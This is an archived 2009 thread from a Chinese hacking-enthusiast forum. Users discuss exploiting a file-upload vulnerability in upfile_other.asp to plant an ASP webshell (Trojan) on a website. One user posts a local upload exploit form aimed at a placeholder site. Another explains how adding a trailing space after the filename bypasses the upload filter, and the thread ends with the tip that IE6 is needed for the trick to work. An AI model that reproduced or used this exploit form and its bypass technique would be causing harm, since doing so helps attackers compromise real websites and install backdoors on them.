【3.A.S.T】网络安全爱好者's Archiver

黑客学习

jhxx 发表于 2009-12-15 15:06

本地上传页面的问题??

在利用本地上传页面时,第一个空选图片很正常,第二个空选择一个ASP木马,但是后面要加个空格,请问下后面的那个空格怎么加上去的,我试了很长时间也没有搞会,知道的告诉声,非常感谢。

柔肠寸断 发表于 2009-12-15 15:26

你利用的是哪个漏洞的本地上传,最好把代码也发上来分析下

jhxx 发表于 2009-12-15 18:22

[i=s] 本帖最后由 jhxx 于 2009-12-15 18:23 编辑 [/i]

本地页面上传代码在下面:
<!-注意:下面就是填寫漏洞文件地址的地方,其他部分代碼禁止修改!---by wiki!-->
<form action=http://www.xxxxx.com/upfile_other.asp method=post name=form1 onsubmit=return
click() enctype=multipart/form-data>
<div align="center"><strong>·本地上传页·穆馬和文件·利用漏洞上傳·作弊工具·</strong></div>
<p align="center">源頭文件路徑:
       <input name="filename" type="file" class="txt1" size="20">
</p>
<p align="center">目標文件路徑:
       <input name="filename1" type=file class=txt1 size=20>
</p>
<p align="center">
       <input type=submit name=submit value=·立即上傳·       style=border"1px double rgb(88.88.88);font:9pt>
       <input name=imgwidth type=hidden id=imgwidth>
       <input name=imgheight type=hidden id=imgheight>
       <input name=aligntype type=hidden id="channelid" value="0">
       <input name="channelid" type="hidden" id="channelurlid" value=0>
       <input name="id" type="hidden" id="id2">
</p>
<p align="center">(注意:具體漏洞文件路徑要在源代碼中修改!)</p>
<p>&nbsp;</p>
<p align="center">版權所有 IEANSOFT HACK STUDIO INC 保留所有權利!</p>
<form>
谢谢小柔帮看看了!!!

柔肠寸断 发表于 2009-12-15 19:02

是针对upfile_other.asp的上传漏洞
具体什么我也不清楚
加空格很简单,就是你选择好文件之后在文件后加一个空格,然后再点击上传即可

jhxx 发表于 2009-12-15 19:41

选完文件后按空格就出来文件选择对话框了,我就纳闷了,看视频别人直接加就可以,为什么我的就不行呢

jhxx 发表于 2009-12-17 21:52

知道原因了,浏览器的原因,IE8点空格就会出现选择对话框,把浏览器换成IE6就可以了

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.